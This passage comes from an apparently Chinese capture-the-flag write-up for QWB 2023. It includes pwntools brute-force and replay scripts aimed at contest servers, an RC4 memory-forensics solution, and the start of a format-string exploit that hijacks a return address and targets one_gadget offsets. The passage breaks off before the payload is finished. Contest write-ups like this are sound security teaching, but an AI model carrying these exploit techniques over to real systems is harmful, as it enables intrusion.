class="hljs-string">&#x27;error&#x27;</span><br>a = <span class="hljs-number">9</span><br>flag = <span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">send_string</span>(<span class="hljs-params">data</span>):<br>    r = remote(<span class="hljs-string">&#x27;101.200.122.251&#x27;</span>, <span class="hljs-number">12199</span>)  <span class="hljs-comment"># 远程服务器的地址和端口号，替换为实际值</span><br>    r.recvuntil(<span class="hljs-string">b&quot;Enter a string (should be less than 10 bytes): &quot;</span>)  <span class="hljs-comment"># 接收并丢弃直到遇到指定字符串的输入</span><br>    r.sendline(data)  <span class="hljs-comment"># 发送数据到服务器</span><br>    result = r.recvline().decode().strip()  <span class="hljs-comment"># 接收服务器回传的数据</span><br>    <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;flag&#x27;</span> <span class="hljs-keyword">in</span> result:<br>        <span class="hljs-built_in">print</span>(result)<br>        os.system(exit)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Sent:&quot;</span>, data)  <span class="hljs-comment"># 打印发送的数据</span><br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Received:&quot;</span>, result)  <span class="hljs-comment"># 打印接收到的数据</span><br>    r.close()  <span class="hljs-comment"># 关闭与服务器的连接</span><br>    <span class="hljs-keyword">return</span> result<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">find_correct_string</span>(<span class="hljs-params">current_string, position</span>):<br>    <span class="hljs-keyword">global</span> flag<br>    <span class="hljs-keyword">global</span> a<br>    charset = string.digits + string.ascii_letters  <span class="hljs-comment"># 可能字符的集合，digits 是数字，ascii_letters 是字母</span><br><br>    <span class="hljs-keyword">if</span> position == <span class="hljs-number">9</span>:  <span class="hljs-comment"># 达到字符串的长度上限</span><br>        result = send_string(current_string)  <span class="hljs-comment"># 发送当前字符串并获取结果</span><br>        <span class="hljs-keyword">if</span> result[-<span class="hljs-number">1</span>] == <span class="hljs-string">&#x27;1&#x27;</span>:  <span class="hljs-comment"># 如果结果的最后一个字符是 &#x27;1&#x27;，表示字符串是正确的</span><br>            <span class="hljs-keyword">return</span> current_string<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span><br>    <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> charset:  <span class="hljs-comment"># 遍历可能的字符集合</span><br>        test_string = ( flag + c +<span class="hljs-string">&#x27;0&#x27;</span>*(<span class="hljs-number">8</span>-<span class="hljs-built_in">len</span>(flag))).encode()  <span class="hljs-comment"># 组合测试字符串，将未使用的位置填充为 &#x27;0&#x27;</span><br>        result = send_string(test_string)  <span class="hljs-comment"># 发送测试字符串并获取结果</span><br>        <span class="hljs-keyword">if</span> result[-(<span class="hljs-number">9</span>-<span class="hljs-built_in">len</span>(flag))] == <span class="hljs-string">&#x27;1&#x27;</span>: <br>            flag = flag + <span class="hljs-built_in">chr</span>(test_string[-(<span class="hljs-number">9</span>-<span class="hljs-built_in">len</span>(flag))])<br>            <span class="hljs-built_in">print</span>(flag)<br>            recursive_result = find_correct_string(test_string.decode(), position+<span class="hljs-number">1</span>)  <span class="hljs-comment"># 递归调用，继续验证下一个字符位置</span><br>            <span class="hljs-keyword">if</span> recursive_result <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-literal">None</span>:  <span class="hljs-comment"># 如果递归结果不为空，表示找到了正确的字符串</span><br>                <span class="hljs-keyword">return</span> recursive_result<br>          <br>                <br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span>  <span class="hljs-comment"># 如果在所有可能的字符中都未找到正确的字符串，则返回 None</span><br><br>correct_string = find_correct_string(<span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-number">0</span>)  <span class="hljs-comment"># 从空字符串开始验证</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Correct string:&quot;</span>, correct_string)  <span class="hljs-comment"># 打印正确的字符串</span><br></code></pre></td></tr></table></figure>
<p><code>00qwbGood</code><br><img src="/mdimg/qwb2023/6.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="Happy-Chess"><a href="#Happy-Chess" class="headerlink" title="Happy Chess"></a>Happy Chess</h3><h4 id="解题思路-4"><a href="#解题思路-4" class="headerlink" title="解题思路"></a>解题思路</h4><p>每轮输入<code>1 1</code>时观察靶机返回值，怀疑存在逻辑漏洞<br>然后每轮输入<code>1 1</code> 来循环最后以<code>exit</code>结束对局并开启下一局，循环10轮后就拿到了flag<br><img src="/mdimg/qwb2023/7.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="强网先锋"><a href="#强网先锋" class="headerlink" title="强网先锋"></a>强网先锋</h2><h3 id="石头剪刀布"><a href="#石头剪刀布" class="headerlink" title="石头剪刀布"></a>石头剪刀布</h3><h4 id="解题思路-5"><a href="#解题思路-5" class="headerlink" title="解题思路"></a>解题思路</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># 爆破求解 发现机器出拳在前面出拳顺序相同的情况下始终不变 </span><br><span class="hljs-comment"># 每轮剪刀石头布都尝试一次</span><br><span class="hljs-comment"># 获胜则记录下出拳, 用于下一次的求解</span><br><span class="hljs-comment"># 运行爆破后再手动将输出结果粘贴到success函数</span><br><span class="hljs-keyword">import</span> random<br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level = <span class="hljs-string">&#x27;critical&#x27;</span><br><br>link = <span class="hljs-string">&#x27;nc 8.147.129.191 42289&#x27;</span>.split(<span class="hljs-string">&#x27; &#x27;</span>)<br>p = remote(link[<span class="hljs-number">1</span>], link[<span class="hljs-number">2</span>])<br><br>winning_strategy = []<br><br><span class="hljs-comment"># while len(winning_strategy) &lt; 100:</span><br><span class="hljs-keyword">while</span> <span class="hljs-number">0</span>:<br>    p = remote(link[<span class="hljs-number">1</span>], link[<span class="hljs-number">2</span>])<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> winning_strategy:<br>        p.sendline(<span class="hljs-built_in">str</span>(i).encode())<br>    p.recv()<br>    <span class="hljs-comment"># out = (p.recv().decode(encoding=&#x27;utf-8&#x27;))[-50:]</span><br>    <span class="hljs-comment"># out = p.recvuntil(&#x27;你的分数：&#x27;.encode(encoding=&#x27;utf-8&#x27;))[-50:]</span><br>    out = p.recvrepeat(timeout=<span class="hljs-number">1</span>)[-<span class="hljs-number">180</span>:-<span class="hljs-number">50</span>]<br>    <span class="hljs-comment"># print(p.recvuntil(b&#x27;-----------------------------------&#x27;,drop=1),end=&#x27;\t&#x27;)</span><br>    <span class="hljs-comment"># print(out)</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">3</span>):<br>        p.sendline(<span class="hljs-built_in">str</span>(i).encode())<br>        out = p.recvrepeat(timeout=<span class="hljs-number">1</span>)[-<span class="hljs-number">180</span>:-<span class="hljs-number">50</span>]<br>        <span class="hljs-built_in">print</span>(i, end=<span class="hljs-string">&#x27;\t&#x27;</span>)<br>        <span class="hljs-comment"># print(out)</span><br>        <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;你赢了&#x27;</span>.encode(encoding=<span class="hljs-string">&#x27;utf-8&#x27;</span>) <span class="hljs-keyword">in</span> out:<br>            winning_strategy.append(i)<br>            <span class="hljs-keyword">break</span><br>        <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;平局&#x27;</span>.encode(encoding=<span class="hljs-string">&#x27;utf-8&#x27;</span>) <span class="hljs-keyword">or</span> <span class="hljs-string">&#x27;Me10n赢了&#x27;</span>.encode(encoding=<span class="hljs-string">&#x27;utf-8&#x27;</span>) <span class="hljs-keyword">in</span> out:<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;[-] pass&#x27;</span>)<br>        p.close()<br>        p = remote(link[<span class="hljs-number">1</span>], link[<span class="hljs-number">2</span>])<br>        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> winning_strategy:<br>            p.sendline(<span class="hljs-built_in">str</span>(i).encode())<br>    <span class="hljs-comment"># print(out.decode(encoding=&#x27;utf8&#x27;, errors=&#x27;ignore&#x27;))</span><br>    p.close()<br>    <span class="hljs-built_in">print</span>(<span class="hljs-built_in">len</span>(winning_strategy), winning_strategy)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">success</span>():<br>    win = [<span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">2</span>, <span class="hljs-number">2</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>]<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> win:<br>        p.sendline(<span class="hljs-built_in">str</span>(i).encode())<br><br>success()<br>p.interactive()<br></code></pre></td></tr></table></figure>
<h3 id="SpeedUp"><a href="#SpeedUp" class="headerlink" title="SpeedUp"></a>SpeedUp</h3><h4 id="解题思路-6"><a href="#解题思路-6" class="headerlink" title="解题思路"></a>解题思路</h4><p><code>https://oeis.org/A244060/list</code><br><img src="/mdimg/qwb2023/8.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="找到PNG了吗"><a href="#找到PNG了吗" class="headerlink" title="找到PNG了吗"></a>找到PNG了吗</h3><h4 id="题目说明-2"><a href="#题目说明-2" class="headerlink" title="题目说明"></a>题目说明</h4><h4 id="解题思路-7"><a href="#解题思路-7" class="headerlink" title="解题思路"></a>解题思路</h4><p>不太会Linux内存取证，用R-studio看了一下，没找到啥有用的东西，直接Strings 找到PNG了吗.mem（这个过程要耗一点时间，文件太大了）<br>然后在字符串中翻看到一处加密程序<br><img src="/mdimg/qwb2023/9.png" srcset="/img/loading.gif" lazyload><br>主要加密函数如下，根据 rc4_encrypt_decrypt可以看出这是一个对文件进行RC4加密的程序</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-type">int</span> a=<span class="hljs-number">0</span>;<br>    <span class="hljs-type">char</span> q[<span class="hljs-number">10</span>];<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> key[]=<span class="hljs-string">&quot;do_not_care&quot;</span>;<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> key2[] = <span class="hljs-string">&quot;where_is_the_key&quot;</span>;<br>    FILE* file = <span class="hljs-built_in">fopen</span>(<span class="hljs-string">&quot;have_your_fun.jocker&quot;</span>, <span class="hljs-string">&quot;wb&quot;</span>);<br>    <span class="hljs-keyword">if</span> (file == <span class="hljs-literal">NULL</span>) &#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;open file failed!\n&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> *str;<br>    str = (<span class="hljs-type">char</span> *) <span class="hljs-built_in">malloc</span>(<span class="hljs-number">20000</span>);<br>    <span class="hljs-built_in">memcpy</span>(str, buff, <span class="hljs-number">20000</span>);<br><span class="hljs-built_in">rc4_encrypt_decrypt</span>(key2, str, <span class="hljs-number">20000</span>);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;please give me the key of fun:&quot;</span>);<br>    <span class="hljs-built_in">scanf</span>(<span class="hljs-string">&quot;%s&quot;</span>,q);<br>    <span class="hljs-built_in">rc4_encrypt_decrypt</span>(key, str, <span class="hljs-number">20000</span>);<br>    <br>    <span class="hljs-built_in">fwrite</span>(buff, <span class="hljs-number">1</span>, <span class="hljs-number">20000</span>, file);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;maybe you go wrong&quot;</span>);<br>    <span class="hljs-built_in">fclose</span>(file);<br>    <span class="hljs-built_in">close</span>(clientSocket);<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br></code></pre></td></tr></table></figure>
<p>再根据题目信息猜测这个加密程序对发送的png图片做了处理，所以我们逆向思维去找加密后的png图片，以png文件头为特征值RC4加密得到，新的文件头0e 3c b4 2f 99 96 95 56<br><img src="/mdimg/qwb2023/10.png" srcset="/img/loading.gif" lazyload><br><img src="/mdimg/qwb2023/11.png" srcset="/img/loading.gif" lazyload><br>往下翻，看到一些无效数据，所以在这里下断点，将上面的hex数据另存为文件，再用赛博厨子解密即可<br><img src="/mdimg/qwb2023/12.png" srcset="/img/loading.gif" lazyload><br><a target="_blank" rel="noopener" href="https://cyberchef.cn/#recipe=To_Hex('Space',0)RC4(%7B'option':'UTF8','string':'do_not_care'%7D,'Hex','Latin1')To_Hex('Space',0/disabled)Render_Image('Raw')&input=Djy0L5mWlVa%2Ba%2B/pQkhdGNUXemfs8DMUX0aar/xADCXQusOwoIskPQRXYX3sfWfZidGPJ1uM4Tk13pVKniN23LZXVSm7ZIGfFniwZwHKUxr%2B%2Bj0YkHCzR3BeQnszEuY/HCRN/mCwxzKm6NBbVj6SXUhMscmko8ugK7FhejOTl9ktAGE9NEcw/xWJVeXVA5nR9hVn13gAH9PDOHzgrnxFhARF64giI4Ou%2B6ROhmWuZMpGKt4LespSJNqj0r9XTrYVrWpF1qn9NXdC3GCO1NSd4Y7NtJFBWAzlMuXxIM5i3z64cLkspdQR0qRi33W5QvzE4KBt4%2Bp0u4Zwvl4RaMW3UGwA2lBrrjzOTMA%2Bbd4be7mru04srcktpuBuVkDGb6KJAXO74qu1QMx2wPFY2td5ohJtD4IZbsFp9G9oyYDg42IbaOSlPWxelCKDz0cZAqlzt6vEkbidlBsyoWyoi8hIYr2k%2BaZ8t8dpFHPBCg0C1a1xtnb5Myjr99vDQfNUVfJ7K1rlWLxw3ulb0M4dIde4SwlNsUjM0CMYOIWBlQHPFqNjSXQNoETanSap0%2Bkf2Ncblh5E6Z81Cd9AEE7NV4FIbyeKlLaFEhrUdBf0%2BGXG7LZs2bWsTW1zPG2H2CYndxh9SuNUyjJYmPhcr88yk65ePanzQdyAg9y3XJM8L4zry4YEAnfum%2BVdxXDT0C1yqJUUI1Ywmfy6yMjzaLwDeJmJiQJ93rT8y7kqnjki1uvDK%2BEl6BzMr3OWeGKlbci%2BdAPamVTscJsmWYHCRQgdP/U9FiJED5g05YFC6PJvR92gNpspbf8UcPkN4WstbLbmMYBx4Z/gVB%2BQhTSY0uAKge9gnBZtnmu5a2NQwapC9GFJVJ9kmWXW3kylTLCH69PDg9A4GOvCY7vjhL5DH%2BZWU7yTayn%2BPPYpksB98mgP1VcCQzk79xVcs8edOCcSAo4vNypAFYN4lMni%2BhvG3mo7xBwWdU1Wdd00xzyHyAAbpTgjgXpAvNh9luxmhzz31%2BQP9SnZitm1cqxIsFuokZzwA7RAbNYd14/CHRS3Y4TJ6Tb8IuiDqa2ERGh9GBMD6CYfOfVzH0sRrCG2X9l5Cz/8ZhG367j6ufk3ynT2RQlzkKz7kd/rU1o8fK0nIa2Mgm%2BHndMvfLF/hE85C1D0Dg3pEVOUJ4xt72Q10s%2BorlbGtNt6qLo%2BmlBasagWqffqp%2B0qFg%2BagkHu1d8/UEhOapAw3qtWd6iQ5c0kXRYeGfGJwJjkURuHTOMPxnN6anxqrp47GqKSU8DVjuCGnSbG%2BsMTygEMaaV/EfFhh/rJPckMLVuBvOjO49KsW6AoVkIji8ICEuDVQZE1o99p2hgTU7q91i/c0zdzYz8u%2BzVNo/A3znyPUrHO68mU47TzfD8s2tMGJW7%2BYHAnkR0D%2BD1f82tmchEtJmbt2bHBkEhNyU/MtFZ/h2LzeVBWdFXmDTRQVSunO5R7HkwwkH5Ao9PyhmfvO1N0aspxpKRykS1fv8GryvNwNm/z02x9mYt0HKPZVHMpsfrGomRXfV8%2BKQR5Jj%2BRExJJ4rD3CZpeOdwtCYY7cxHeWMNPdt8/8Y0CXMC0zKltpwF8D5jjVoqdMbaCxLkXlWxBiPUOTfIDKAOtd798t%2BDsvjV8fR6yCID3L4s1BV8%2B5/c6Oarc/1oh%2Bj65PbzeWJjrJHa4Ve18S0S/HZECA%2BhV6X37HW69TFSVGpJwes%2Bj0PM4Gj0MwHiE1WgVGzHk3oyQG015mTJkvgz0V8nQpA6%2BFHqHalh2YCR2gYJxLIBzVI/7iMzdQZVdsbZsPnLE9StlQfymRE1725udSzL%2BP8MXy5pyEJDHOLnhSamNywH0C8NaS/gwsziqwg3WyHH8pgJJ2iwPE/G6SjhWTO5f84iO10kAFeAo%2B0pbRSgxR4w04pflggZ6bVPJOP0VfmkalUVfI7ACsmPuiWSzA3ORRlKPOSDGAZR7/6t0trA/WiCS1fj9PoirpojrwWBj9EiAZstv2k7YeVk9T1qn4zXShqzpVlJA8H04AIThB5tMDVJb9CPZ%2Be3OAxmoF3ACWJaHNOz7U1TAgb25mvvYlL0VvuCAzEinFtW/exXt8aYeO0i4BAEmRLemzJSRNxl4100u3lqvGOgUvi8L%2BBOEh8X3fZnEgpbH8PFVrX%2BerZFH%2BXr3NavkhwJVJTAj0xt7c4V6V14iHLrItQSOtR0dSL8KY0pn9xFsAqIUehfjFOW6mGq8ZIAnbGopoqHGBNGfJj5QTMBsSG2WaxE4aBSIW7QiFy7E/5mHB23MM%2BKOLwXAHJIVU7eCdt/Cbvz412fZN0vL2et8hqlVXysZ4s4U6WHoMtm%2B6F7VpNB69NNgsmwoefLfOF3KF/ROsWgcee%2BJtHQ73SF9gG6tBV%2BcnkQa4FySWUVhGA9Sj3P2YBszCc01icoT1GoA3qtoAisVgzpLK00BjwNGfM3jrYdfFB4RK0aoapH1FNW8dS6bJ1UPWDUOj5Xfm0ucrqD0jxUdGbZrplg0M%2BgX4l9kIMXCwGfhaY%2Bo5IqAmmLaKvROgNo6n5DsgwEApK13o7k8EikxEbgw/Q5CFH28bpD/g6r3/jp0jlV65T2QgJx2ThzNNPntbd9oOZMcv4gJN%2BYSQ0tP4mKLyO15SbQVI1X0ND2aDqnhKv8Vw0mydEZMQOZUe11NERYJ7cAGBkL8gbNLNKcG6m1ZExBD/jp8ezd1a4rkaxY3S9zrHBJ80GnS%2BG%2BsqtYEVJ5MjvPIII9qJtoOk%2BWl1sF9XcBm/PI2HvZv/KHovD/3dr1OdLu6Dqf6EnJhfA92UwDj/VOAwGYxtt2l7gNeJ4lhT8mWm4jJe2UKW8nhGOeOgfhpPCkr7pt6GS8s%2Bubgx0lqrzM2f2Py9t5riRRGIXNROLBRWQvyn/42Kme8ql6%2B67fTliyxwY42E7OS1QEdtA6/Ys/HJWs9QZ7RMDGNtBY3%2BLwGy5NV92DzVPmycKCB4LhvRt1zfv1WVM/uWEYmqq5SVSbmR8AMW5lTT2WHMfnEhXj5leW17j/aQg5wmFX5kl8NTodyZ7OtesXKnP1dNIp%2BnJMhnm0dOqr/cK4XvbcoHcnAurnySVjAAO/tP3wRcp2K4IArX7QCkbLr92eFaX0TP%2BvVjmwYM9JTXNyBcfUu%2BcLIWGrUfQ0nQ0VeSgn0w96usmb6vXrDByWEKwfgl5dsUPBPKEttmPFAulPQpbs0ikCWRh23QYM9nr3aB66PNeHoE%2BjKQsQTUhVQUoJ9J7pukRyldlT//JxZylrKZcfYrgJtPDtjE%2BBFRq%2BbUjifVHeX2ejJW%2BvQJmsdAKOjdPzxKpjv/8D37LNEIImgnWWx14YoavYHTKfZn6Y%2BbSLuwEbgMnftSBqCPefltedjci87iGmMUsjnzBwRUVQtsaMeFtiREiGp8eyfHjiON1iV8SZUjxc62Y5zzVlwf0geBTpISiJ4QbwMmdfXRPSBWAxUGs/ukuI1mZZzTq3n%2BESl7Z09UE5sHAOBQnZTV4jsxI3Mh3cnXg%2BbUUGibNa4uI/211zUWvZr0mScnwj0GRbc%2B5QZF5ZnAE5D33nyhNy8iAemQhBYaJQSzJgs8tcMLgi7igehuAN79gHPHfLteDrJlXPAXMnGgsMKxxoXaR9RE7S2ak1lDSdDxVcb6VwU2/You47Huy/Bk/aQS48I%2BK6L795qpdwoeL6Gf2A/3Qv86eKjAZNxquVez6lFzmncLLWEl2WGH4zR47IeZzATtY%2BnCkoYyqyeJyVK6a67oUAzB0Pf1tXrZ%2BXZGMsZmHocQdABbrxLaSh7zVCeklSaGAf3qYlQolE9kd7AOdEq7eOyyNZSZQRnGvTHsIx%2BvU1MIt62jGB5Gou9cwz7zcAjPrm9OqUMR3IIgj8qZdFjzzJ8oUcHifK1BOaB7lo2TmCZchd9yrm%2BikNFTAAAAAAAAAAAIF37vXZVAAAAAP6mHjYAAAEAAAAAAAAAoDI46WZ/"></a><br><img src="/mdimg/qwb2023/12.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="F-ez-fmt-解题人"><a href="#F-ez-fmt-解题人" class="headerlink" title="F | ez_fmt | 解题人"></a>F | ez_fmt | 解题人</h3><h4 id="题目说明-3"><a href="#题目说明-3" class="headerlink" title="题目说明"></a>题目说明</h4><p>格式化字符串漏洞</p>
<h4 id="解题思路-8"><a href="#解题思路-8" class="headerlink" title="解题思路"></a>解题思路</h4><p><img src="/mdimg/qwb2023/13.png" srcset="/img/loading.gif" lazyload><br>gift会泄露栈顶地址，动调可以算出ret参数的地址<br>格式化字符串漏洞任意地址写，可以劫持返回地址，利用printf函数泄露libc地址<br>给了libc文件，直接尝试打one_gadget<br><img src="/mdimg/qwb2023/14.png" srcset="/img/loading.gif" lazyload><br>第二个成功<br>（onegadget地址计算没分情况，概率出)</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><code class="hljs css"><span class="hljs-selector-tag">from</span> pwn import *<br><span class="hljs-selector-tag">from</span> pwn import p64<br>def debug():<br>    gdb.<span class="hljs-built_in">attach</span>(r)<br>    <span class="hljs-built_in">pause</span>()<br><br>r=<span class="hljs-built_in">remote</span>(<span class="hljs-string">&#x27;47.104.24.40&#x27;</span>,<span class="hljs-number">1337</span>)<br>#r=<span class="hljs-built_in">process</span>(<span class="hljs-string">&#x27;./ez_fmt&#x27;</span>)<br>elf=<span class="hljs-built_in">ELF</span>(<span class="hljs-string">&quot;./ez_fmt&quot;</span>)<br>libc=<span class="hljs-built_in">ELF</span>(<span class="hljs-string">&quot;./libc-2.31.so&quot;</span>)<br><span class="hljs-built_in">context</span>(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, os=<span class="hljs-string">&#x27;linux&#x27;</span>, log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br><br>r.<span class="hljs-built_in">recvuntil</span>(b<span class="hljs-string">&#x27;There is a gift for you &#x27;</span>)<br>stack_rsp=<span class="hljs-built_in">int</span>(r.<span class="hljs-built_in">recv</span>(<span class="hljs-number">14</span>),<span class="hljs-number">16</span>)<br><br>#<span class="hljs-built_in">debug</span>()<br>#-----calc addr<br>stack_printf_ret = stack_rsp - <span class="hljs-number">0</span>x8<br>stack_ret = stack_rsp + <span class="hljs-number">0</span>x78<br>stack_printf = stack_rsp + <span class="hljs-number">0</span>x158<br><span class="hljs-built_in">success</span>(<span class="hljs-string">&#x27;stack_rsp: %s&#x27;</span>,<span class="hljs-built_in">hex</span>(stack_rsp))<br><span class="hljs-built_in">success</span>(<span class="hljs-string">&#x27;stack_ret: %s&#x27;</span>,<span class="hljs-built_in">hex</span>(stack_ret))<br><span class="hljs-built_in">success</span>(<span class="hljs-string">&#x27;stack_printf: %s&#x27;</span>,<span class="hljs-built_in">hex</span>(stack_printf))<br><br>ogg1 = <span class="hljs-number">0</span>xe3afe<br>ogg2 = <span class="hljs-number">0</span>xe3b01<br>ogg3 = <span class="hljs-number">0</span>xe3b04<br><br>stack_printf_ret_addr = stack_printf_ret &amp; <span class="hljs-number">0</span>xffff<br><span class="hljs-built_in">success</span>(<span class="hljs-string">&#x27;stack_printf_ret_addr %s&#x27;</span>,<span class="hljs-built_in">hex</span>(stack_printf_ret_addr))<br>#<span class="hljs-built_in">debug</span>()<br>#-----hijack ret_addr&amp;&amp;leak libc_base<br>payload=b<span class="hljs-string">&#x27;%19$p&#x27;</span><br>payload+=b<span class="hljs-string">&#x27;%&#x27;</span>+<span class="hljs-built_in">str</span>(<span class="hljs-number">0</span>x1205-<span class="hljs-number">6</span>-<span class="hljs-number">8</span>).<span class="hljs-built_in">encode</span>()+b<span 